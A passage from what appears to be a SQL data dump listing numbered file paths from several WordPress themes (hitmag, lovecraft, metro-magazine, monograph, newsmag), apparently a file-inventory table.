p-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(3950,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(3951,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(3952,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(3953,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(3954,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(3955,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(3956,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(3957,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(3958,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(3959,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(3960,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(3961,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(3962,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(3963,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(3964,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(3965,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(3966,'wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(3967,'wp-content/themes/hitmag/inc/kirki/includes/deprecated.php'),(3968,'wp-content/themes/hitmag/inc/kirki/includes/dynamic-css.php'),(3969,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-checkbox.php'),(3970,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-code.php'),(3971,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color-alpha.php'),(3972,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color-palette.php'),(3973,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color.php'),(3974,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-custom.php'),(3975,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-dashicons.php'),(3976,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-date.php'),(3977,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-dimension.php'),(3978,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(3979,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-editor.php'),(3980,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-generic.php'),(3981,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-group-title.php'),(3982,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-image.php'),(3983,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-kirki-generic.php'),(3984,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-link.php'),(3985,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-multicheck.php'),(3986,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-multicolor.php'),(3987,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-number.php'),(3988,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-palette.php'),(3989,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-preset.php'),(3990,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(3991,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-radio-image.php'),(3992,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-radio.php'),(3993,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-repeater.php'),(3994,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-select.php'),(3995,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-select2-multiple.php'),(3996,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-select2.php'),(3997,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-slider.php'),(3998,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-sortable.php'),(3999,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-spacing.php'),(4000,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-switch.php'),(4001,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-text.php'),(4002,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-textarea.php'),(4003,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-toggle.php'),(4004,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-typography.php'),(4005,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-upload.php'),(4006,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-url.php'),(4007,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-filed-link.php'),(4008,'wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-filed-url.php'),(4009,'wp-content/themes/hitmag/inc/kirki/includes/lib/class-aricolor.php'),(4010,'wp-content/themes/hitmag/inc/kirki/includes/lib/class-kirki-color.php'),(4011,'wp-content/themes/hitmag/inc/kirki/includes/output/class-kirki-output.php'),(4012,'wp-content/themes/hitmag/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(4013,'wp-content/themes/hitmag/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(4014,'wp-content/themes/hitmag/inc/kirki/includes/output/field/class-kirki-output-field-typography.php'),(4015,'wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(4016,'wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(4017,'wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(4018,'wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property.php'),(4019,'wp-content/themes/hitmag/inc/kirki/includes/panels/class-kirki-panels-default-panel.php'),(4020,'wp-content/themes/hitmag/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(4021,'wp-content/themes/hitmag/inc/kirki/includes/scripts/class-kirki-scripts-icons.php'),(4022,'wp-content/themes/hitmag/inc/kirki/includes/scripts/class-kirki-scripts-loading.php'),(4023,'wp-content/themes/hitmag/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(4024,'wp-content/themes/hitmag/inc/kirki/includes/sections/class-kirki-sections-default-section.php'),(4025,'wp-content/themes/hitmag/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php'),(4026,'wp-content/themes/hitmag/inc/kirki/includes/sections/class-kirki-sections-hover-section.php'),(4027,'wp-content/themes/hitmag/inc/kirki/includes/settings/class-kirki-settings-default-setting.php'),(4028,'wp-content/themes/hitmag/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php'),(4029,'wp-content/themes/hitmag/inc/kirki/includes/styles/class-kirki-styles-customizer.php'),(4030,'wp-content/themes/hitmag/inc/kirki/includes/styles/class-kirki-styles-frontend.php'),(4031,'wp-content/themes/hitmag/inc/kirki/includes/styles/class-kirki-styles-output-css.php'),(4032,'wp-content/themes/hitmag/inc/kirki/includes/webfonts.php'),(4033,'wp-content/themes/hitmag/inc/kirki/kirki.php'),(4034,'wp-content/themes/hitmag/inc/kirki/package.json'),(4035,'wp-content/themes/hitmag/inc/kirki/readme.txt'),(4036,'wp-content/themes/hitmag/inc/template-tags.php'),(4037,'wp-content/themes/hitmag/inc/widgets/block-posts-dual.php'),(4038,'wp-content/themes/hitmag/inc/widgets/block-posts-grid.php'),(4039,'wp-content/themes/hitmag/inc/widgets/block-posts-single.php'),(4040,'wp-content/themes/hitmag/inc/widgets/popular-tags-comments.php'),(4041,'wp-content/themes/hitmag/inc/widgets/sidebar-posts.php'),(4042,'wp-content/themes/hitmag/index.php'),(4043,'wp-content/themes/hitmag/js/customizer.js'),(4044,'wp-content/themes/hitmag/js/html5shiv.js'),(4045,'wp-content/themes/hitmag/js/html5shiv.min.js'),(4046,'wp-content/themes/hitmag/js/jquery.flexslider-min.js'),(4047,'wp-content/themes/hitmag/js/jquery.flexslider.js'),(4048,'wp-content/themes/hitmag/js/jquery.magnific-popup.js'),(4049,'wp-content/themes/hitmag/js/jquery.magnific-popup.min.js'),(4050,'wp-content/themes/hitmag/js/navigation.js'),(4051,'wp-content/themes/hitmag/js/scripts.js'),(4052,'wp-content/themes/hitmag/js/skip-link-focus-fix.js'),(4053,'wp-content/themes/hitmag/page.php'),(4054,'wp-content/themes/hitmag/readme.txt'),(4055,'wp-content/themes/hitmag/rtl.css'),(4056,'wp-content/themes/hitmag/screenshot.png'),(4057,'wp-content/themes/hitmag/search.php'),(4058,'wp-content/themes/hitmag/sidebar.php'),(4059,'wp-content/themes/hitmag/single.php'),(4060,'wp-content/themes/hitmag/style.css'),(4061,'wp-content/themes/hitmag/template-magazine.php'),(4062,'wp-content/themes/hitmag/template-parts/authorbox.php'),(4063,'wp-content/themes/hitmag/template-parts/content-none.php'),(4064,'wp-content/themes/hitmag/template-parts/content-page.php'),(4065,'wp-content/themes/hitmag/template-parts/content-search.php'),(4066,'wp-content/themes/hitmag/template-parts/content-single.php'),(4067,'wp-content/themes/hitmag/template-parts/content.php'),(4068,'wp-content/themes/hitmag/template-parts/featured-slider.php'),(4069,'wp-content/themes/hitmag/template-parts/menu-social.php'),(4070,'wp-content/themes/hitmag/template-parts/related-posts.php'),(4071,'wp-content/themes/index.php'),(4072,'wp-content/themes/lovecraft/404.php'),(4073,'wp-content/themes/lovecraft/archive.php'),(4074,'wp-content/themes/lovecraft/changelog.txt'),(4075,'wp-content/themes/lovecraft/comments.php'),(4076,'wp-content/themes/lovecraft/content-aside.php'),(4077,'wp-content/themes/lovecraft/content.php'),(4078,'wp-content/themes/lovecraft/footer.php'),(4079,'wp-content/themes/lovecraft/full-width-page-template.php'),(4080,'wp-content/themes/lovecraft/functions.php'),(4081,'wp-content/themes/lovecraft/genericons/font/Genericons.eot'),(4082,'wp-content/themes/lovecraft/genericons/font/Genericons.svg'),(4083,'wp-content/themes/lovecraft/genericons/font/Genericons.ttf'),(4084,'wp-content/themes/lovecraft/genericons/font/Genericons.woff'),(4085,'wp-content/themes/lovecraft/genericons/genericons.css'),(4086,'wp-content/themes/lovecraft/header.php'),(4087,'wp-content/themes/lovecraft/image.php'),(4088,'wp-content/themes/lovecraft/images/header.jpg'),(4089,'wp-content/themes/lovecraft/index.php'),(4090,'wp-content/themes/lovecraft/js/doubletaptogo.js'),(4091,'wp-content/themes/lovecraft/js/global.js'),(4092,'wp-content/themes/lovecraft/js/theme-customizer.js'),(4093,'wp-content/themes/lovecraft/license.txt'),(4094,'wp-content/themes/lovecraft/lovecraft-editor-styles.css'),(4095,'wp-content/themes/lovecraft/page.php'),(4096,'wp-content/themes/lovecraft/readme.txt'),(4097,'wp-content/themes/lovecraft/screenshot.png'),(4098,'wp-content/themes/lovecraft/search.php'),(4099,'wp-content/themes/lovecraft/searchform.php'),(4100,'wp-content/themes/lovecraft/sidebar.php'),(4101,'wp-content/themes/lovecraft/single.php'),(4102,'wp-content/themes/lovecraft/style.css'),(4103,'wp-content/themes/lovecraft/widgets/flickr-widget.php'),(4104,'wp-content/themes/lovecraft/widgets/recent-comments.php'),(4105,'wp-content/themes/lovecraft/widgets/recent-posts.php'),(4106,'wp-content/themes/metro-magazine/404.php'),(4107,'wp-content/themes/metro-magazine/archive.php'),(4108,'wp-content/themes/metro-magazine/comments.php'),(4109,'wp-content/themes/metro-magazine/css/font-awesome.css'),(4110,'wp-content/themes/metro-magazine/css/jquery.sidr.light.css'),(4111,'wp-content/themes/metro-magazine/css/style.php'),(4112,'wp-content/themes/metro-magazine/footer.php'),(4113,'wp-content/themes/metro-magazine/functions.php'),(4114,'wp-content/themes/metro-magazine/header.php'),(4115,'wp-content/themes/metro-magazine/images/arrow-up.png'),(4116,'wp-content/themes/metro-magazine/images/bg-quote.png'),(4117,'wp-content/themes/metro-magazine/images/bg-search.png'),(4118,'wp-content/themes/metro-magazine/images/btn-next-month.png'),(4119,'wp-content/themes/metro-magazine/images/btn-prev-month.png'),(4120,'wp-content/themes/metro-magazine/images/img1.jpg'),(4121,'wp-content/themes/metro-magazine/images/img18.jpg'),(4122,'wp-content/themes/metro-magazine/images/img56.jpg'),(4123,'wp-content/themes/metro-magazine/images/img57.jpg'),(4124,'wp-content/themes/metro-magazine/images/img58.jpg'),(4125,'wp-content/themes/metro-magazine/images/img59.jpg'),(4126,'wp-content/themes/metro-magazine/images/modal-close.png'),(4127,'wp-content/themes/metro-magazine/images/no-sidebar.png'),(4128,'wp-content/themes/metro-magazine/images/right-sidebar.png'),(4129,'wp-content/themes/metro-magazine/images/video-play-icon-hover.png'),(4130,'wp-content/themes/metro-magazine/images/video-play-icon.jpg'),(4131,'wp-content/themes/metro-magazine/images/video-play-icon.png'),(4132,'wp-content/themes/metro-magazine/inc/css/admin.css'),(4133,'wp-content/themes/metro-magazine/inc/custom-functions.php'),(4134,'wp-content/themes/metro-magazine/inc/customizer/ads.php'),(4135,'wp-content/themes/metro-magazine/inc/customizer/breadcrumb.php'),(4136,'wp-content/themes/metro-magazine/inc/customizer/catcolor.php'),(4137,'wp-content/themes/metro-magazine/inc/customizer/color.php'),(4138,'wp-content/themes/metro-magazine/inc/customizer/custom.php'),(4139,'wp-content/themes/metro-magazine/inc/customizer/customizer.php'),(4140,'wp-content/themes/metro-magazine/inc/customizer/default.php'),(4141,'wp-content/themes/metro-magazine/inc/customizer/home.php'),(4142,'wp-content/themes/metro-magazine/inc/customizer/sanitization-functions.php'),(4143,'wp-content/themes/metro-magazine/inc/customizer/social.php'),(4144,'wp-content/themes/metro-magazine/inc/extras.php'),(4145,'wp-content/themes/metro-magazine/inc/info.php'),(4146,'wp-content/themes/metro-magazine/inc/jetpack.php'),(4147,'wp-content/themes/metro-magazine/inc/js/admin.js'),(4148,'wp-content/themes/metro-magazine/inc/metabox.php'),(4149,'wp-content/themes/metro-magazine/inc/template-functions.php'),(4150,'wp-content/themes/metro-magazine/inc/template-hooks.php'),(4151,'wp-content/themes/metro-magazine/inc/widgets/widget-featured-post.php'),(4152,'wp-content/themes/metro-magazine/inc/widgets/widget-popular-post.php'),(4153,'wp-content/themes/metro-magazine/inc/widgets/widget-recent-post.php'),(4154,'wp-content/themes/metro-magazine/inc/widgets/widget-social-links.php'),(4155,'wp-content/themes/metro-magazine/inc/widgets/widgets.php'),(4156,'wp-content/themes/metro-magazine/inc/wp-hooks.php'),(4157,'wp-content/themes/metro-magazine/index.php'),(4158,'wp-content/themes/metro-magazine/js/custom.js'),(4159,'wp-content/themes/metro-magazine/js/customizer.js'),(4160,'wp-content/themes/metro-magazine/js/jquery.sidr.js'),(4161,'wp-content/themes/metro-magazine/page.php'),(4162,'wp-content/themes/metro-magazine/readme.txt'),(4163,'wp-content/themes/metro-magazine/screenshot.png'),(4164,'wp-content/themes/metro-magazine/search.php'),(4165,'wp-content/themes/metro-magazine/sidebar.php'),(4166,'wp-content/themes/metro-magazine/single.php'),(4167,'wp-content/themes/metro-magazine/style.css'),(4168,'wp-content/themes/metro-magazine/template-home.php'),(4169,'wp-content/themes/metro-magazine/template-parts/content-blog.php'),(4170,'wp-content/themes/metro-magazine/template-parts/content-none.php'),(4171,'wp-content/themes/metro-magazine/template-parts/content-page.php'),(4172,'wp-content/themes/metro-magazine/template-parts/content-search.php'),(4173,'wp-content/themes/metro-magazine/template-parts/content.php'),(4174,'wp-content/themes/monograph/404.php'),(4175,'wp-content/themes/monograph/archive.php'),(4176,'wp-content/themes/monograph/comments.php'),(4177,'wp-content/themes/monograph/css/editor-style.css'),(4178,'wp-content/themes/monograph/footer.php'),(4179,'wp-content/themes/monograph/front-page.php'),(4180,'wp-content/themes/monograph/functions.php'),(4181,'wp-content/themes/monograph/genericons/Genericons.eot'),(4182,'wp-content/themes/monograph/genericons/Genericons.svg'),(4183,'wp-content/themes/monograph/genericons/Genericons.ttf'),(4184,'wp-content/themes/monograph/genericons/Genericons.woff'),(4185,'wp-content/themes/monograph/genericons/genericons.css'),(4186,'wp-content/themes/monograph/header.php'),(4187,'wp-content/themes/monograph/inc/class-dotorg-plugin-review.php'),(4188,'wp-content/themes/monograph/inc/customizer.php'),(4189,'wp-content/themes/monograph/inc/extras.php'),(4190,'wp-content/themes/monograph/inc/jetpack.php'),(4191,'wp-content/themes/monograph/inc/plugin-enhancements.js'),(4192,'wp-content/themes/monograph/inc/plugin-enhancements.php'),(4193,'wp-content/themes/monograph/inc/template-tags.php'),(4194,'wp-content/themes/monograph/index.php'),(4195,'wp-content/themes/monograph/js/customizer.js'),(4196,'wp-content/themes/monograph/js/jquery.slicknav.js'),(4197,'wp-content/themes/monograph/js/jquery.slicknav.min.js'),(4198,'wp-content/themes/monograph/js/monograph.js'),(4199,'wp-content/themes/monograph/js/superfish.js'),(4200,'wp-content/themes/monograph/js/superfish.min.js'),(4201,'wp-content/themes/monograph/page-templates/fullwidth.php'),(4202,'wp-content/themes/monograph/page-templates/sidebar-page.php'),(4203,'wp-content/themes/monograph/page.php'),(4204,'wp-content/themes/monograph/readme.txt'),(4205,'wp-content/themes/monograph/rtl.css'),(4206,'wp-content/themes/monograph/screenshot.png'),(4207,'wp-content/themes/monograph/search.php'),(4208,'wp-content/themes/monograph/sidebar-footer.php'),(4209,'wp-content/themes/monograph/sidebar.php'),(4210,'wp-content/themes/monograph/single.php'),(4211,'wp-content/themes/monograph/style.css'),(4212,'wp-content/themes/monograph/template-parts/content-header-exclusive.php'),(4213,'wp-content/themes/monograph/template-parts/content-home-categories.php'),(4214,'wp-content/themes/monograph/template-parts/content-home-featured-2.php'),(4215,'wp-content/themes/monograph/template-parts/content-home-featured.php'),(4216,'wp-content/themes/monograph/template-parts/content-none.php'),(4217,'wp-content/themes/monograph/template-parts/content-page.php'),(4218,'wp-content/themes/monograph/template-parts/content-single.php'),(4219,'wp-content/themes/monograph/template-parts/content.php'),(4220,'wp-content/themes/newsmag/404.php'),(4221,'wp-content/themes/newsmag/Gruntfile.js'),(4222,'wp-content/themes/newsmag/LICENSE'),(4223,'wp-content/themes/newsmag/archive.php'),(4224,'wp-content/themes/newsmag/assets/css/style.css'),(4225,'wp-content/themes/newsmag/assets/css/style.css.map'),(4226,'wp-content/themes/newsmag/assets/images/banner-placeholder.jpg'),(4227,'wp-content/themes/newsmag/assets/images/banner.jpg'),(4228,'wp-content/themes/newsmag/assets/images/grey.gif'),(4229,'wp-content/themes/newsmag/assets/images/header.jpg'),(4230,'wp-content/themes/newsmag/assets/images/picture_placeholder.jpg'),(4231,'wp-content/themes/newsmag/assets/images/picture_placeholder_list.jpg'),(4232,'wp-content/themes/newsmag/assets/js/functions.js'),(4233,'wp-content/themes/newsmag/assets/js/navigation.js'),(4234,'wp-content/themes/newsmag/assets/js/skip-link-focus-fix.js'),(4235,'wp-content/themes/newsmag/assets/sass/elements/_elements.scss'),(4236,'wp-content/themes/newsmag/assets/sass/elements/_lists.scss'),(4237,'wp-content/themes/newsmag/assets/sass/elements/_tables.scss'),(4238,'wp-content/themes/newsmag/assets/sass/elements/elements/index.php'),(4239,'wp-content/themes/newsmag/assets/sass/forms/_buttons.scss'),(4240,'wp-content/themes/newsmag/assets/sass/forms/_fields.scss'),(4241,'wp-content/themes/newsmag/assets/sass/forms/_forms.scss'),(4242,'wp-content/themes/newsmag/assets/sass/layout/_body.scss'),(4243,'wp-content/themes/newsmag/assets/sass/layout/_footer.scss'),(4244,'wp-content/themes/newsmag/assets/sass/layout/_header.scss'),(4245,'wp-content/themes/newsmag/assets/sass/layout/_layout.scss'),(4246,'wp-content/themes/newsmag/assets/sass/media/_captions.scss'),(4247,'wp-content/themes/newsmag/assets/sass/media/_galleries.scss'),(4248,'wp-content/themes/newsmag/assets/sass/media/_media.scss'),(4249,'wp-content/themes/newsmag/assets/sass/mixins/_mixins-master.scss'),(4250,'wp-content/themes/newsmag/assets/sass/modules/_accessibility.scss'),(4251,'wp-content/themes/newsmag/assets/sass/modules/_alignments.scss'),(4252,'wp-content/themes/newsmag/assets/sass/modules/_breadcrumbs.scss'),(4253,'wp-content/themes/newsmag/assets/sass/modules/_clearings.scss'),(4254,'wp-content/themes/newsmag/assets/sass/modules/_infinite-scroll.scss'),(4255,'wp-content/themes/newsmag/assets/sass/modules/_news-ticker.scss'),(4256,'wp-content/themes/newsmag/assets/sass/modules/_recent-posts.scss'),(4257,'wp-content/themes/newsmag/assets/sass/modules/_related-posts.scss'),(4258,'wp-content/themes/newsmag/assets/sass/navigation/_links.scss'),(4259,'wp-content/themes/newsmag/assets/sass/navigation/_menus.scss'),(4260,'wp-content/themes/newsmag/assets/sass/navigation/_navigation.scss'),(4261,'wp-content/themes/newsmag/assets/sass/navigation/_socials.scss'),(4262,'wp-content/themes/newsmag/assets/sass/navigation/_top-header.scss'),(4263,'wp-content/themes/newsmag/assets/sass/site/_site.scss'),(4264,'wp-content/themes/newsmag/assets/sass/site/primary/_asides.scss'),(4265,'wp-content/themes/newsmag/assets/sass/site/primary/_comments.scss'),(4266,'wp-content/themes/newsmag/assets/sass/site/primary/_posts-and-pages.scss'),(4267,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-banner.scss'),(4268,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-posts.scss'),(4269,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-recent-posts.scss'),(4270,'wp-content/themes/newsmag/assets/sass/site/secondary/_widget-slider.scss'),(4271,'wp-content/themes/newsmag/assets/sass/site/secondary/_widgets.scss'),(4272,'wp-content/themes/newsmag/assets/sass/style.scss'),(4273,'wp-content/themes/newsmag/assets/sass/typography/_copy.scss'),(4274,'wp-content/themes/newsmag/assets/sass/typography/_headings.scss'),(4275,'wp-content/themes/newsmag/assets/sass/typography/_typography.scss'),(4276,'wp-content/themes/newsmag/assets/sass/variables-site/_colors.scss'),(4277,'wp-content/themes/newsmag/assets/sass/variables-site/_structure.scss'),(4278,'wp-content/themes/newsmag/assets/sass/variables-site/_typography.scss'),(4279,'wp-content/themes/newsmag/assets/sass/variables-site/_variables-site.scss'),(4280,'wp-content/themes/newsmag/assets/vendors/adsenseloader/jquery.adsenseloader.js'),(4281,'wp-content/themes/newsmag/assets/vendors/blazy/blazy.js'),(4282,'wp-content/themes/newsmag/assets/vendors/blazy/blazy.min.js'),(4283,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap-theme.min.css'),(4284,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.css'),(4285,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.js'),(4286,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.css'),(4287,'wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.js'),(4288,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.eot'),(4289,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.svg'),(4290,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.ttf'),(4291,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.woff'),(4292,'wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.woff2'),(4293,'wp-content/themes/newsmag/assets/vendors/fontawesome/FontAwesome.otf'),(4294,'wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.css'),(4295,'wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.min.css'),(4296,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.eot'),(4297,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.svg'),(4298,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.ttf'),(4299,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.woff'),(4300,'wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.woff2'),(4301,'wp-content/themes/newsmag/assets/vendors/machothemes/components/adsenseloader.js'),(4302,'wp-content/themes/newsmag/assets/vendors/machothemes/components/blazy.js'),(4303,'wp-content/themes/newsmag/assets/vendors/machothemes/components/gotop.js'),(4304,'wp-content/themes/newsmag/assets/vendors/machothemes/components/mainslider.js'),(4305,'wp-content/themes/newsmag/assets/vendors/machothemes/components/offscreen.js'),(4306,'wp-content/themes/newsmag/assets/vendors/machothemes/components/searchform.js'),(4307,'wp-content/themes/newsmag/assets/vendors/machothemes/components/sticky.js'),(4308,'wp-content/themes/newsmag/assets/vendors/machothemes/components/styleselects.js'),(4309,'wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.js'),(4310,'wp-content/themes/newsmag/assets/vendors/machothemes/machothemes.min.js'),(4311,'wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.js'),(4312,'wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.min.js'),(4313,'wp-content/themes/newsmag/assets/vendors/owl-carousel/ajax-loader.gif'),(4314,'wp-content/themes/newsmag/assets/vendors/owl-carousel/index.html'),(4315,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.css'),(4316,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.js'),(4317,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.css'),(4318,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.js'),(4319,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.theme.default.css'),(4320,'wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.video.play.png'),(4321,'wp-content/themes/newsmag/assets/vendors/sticky/jquery.sticky.js'),(4322,'wp-content/themes/newsmag/changelog.txt'),(4323,'wp-content/themes/newsmag/comments.php'),(4324,'wp-content/themes/newsmag/footer.php'),(4325,'wp-content/themes/newsmag/front-page.php'),(4326,'wp-content/themes/newsmag/functions.php'),(4327,'wp-content/themes/newsmag/header.php'),(4328,'wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome.css'),(4329,'wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome_customizer.css'),(4330,'wp-content/themes/newsmag/inc/admin/welcome-screen/img/ajax-loader.gif'),(4331,'wp-content/themes/newsmag/inc/admin/welcome-screen/img/macho-themes-logo.svg'),(4332,'wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome.js'),(4333,'wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome_customizer.js'),(4334,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/actions-required.php'),(4335,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/changelog.php'),(4336,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/getting-started.php'),(4337,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/recommended-plugins.php'),(4338,'wp-content/themes/newsmag/inc/admin/welcome-screen/sections/support.php'),(4339,'wp-content/themes/newsmag/inc/admin/welcome-screen/welcome-screen.php'),(4340,'wp-content/themes/newsmag/inc/assets/css/custom-editor-style.css'),(4341,'wp-content/themes/newsmag/inc/class-epsilon-typography.php'),(4342,'wp-content/themes/newsmag/inc/components/breadcrumbs/class-newsmag-breadcrumbs.php'),(4343,'wp-content/themes/newsmag/inc/components/breadcrumbs/index.html'),(4344,'wp-content/themes/newsmag/inc/components/lazyload/class-newsmag-lazyload.php'),(4345,'wp-content/themes/newsmag/inc/components/lazyload/index.html'),(4346,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/css/style.css'),(4347,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/data/gfonts.json'),(4348,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_carousel.png'),(4349,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_column.png'),(4350,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_grid.png'),(4351,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_horizontal.png'),(4352,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_slider.png'),(4353,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_vertical_list.png'),(4354,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/checkbox-multiple.js'),(4355,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/customizer.js'),(4356,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/epsilon.js'),(4357,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/previewer.js'),(4358,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.css'),(4359,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.js'),(4360,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.min.js'),(4361,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-checkbox-multiple.php'),(4362,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-slider-control.php'),(4363,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-toggle.php'),(4364,'wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-typography.php'),(4365,'wp-content/themes/newsmag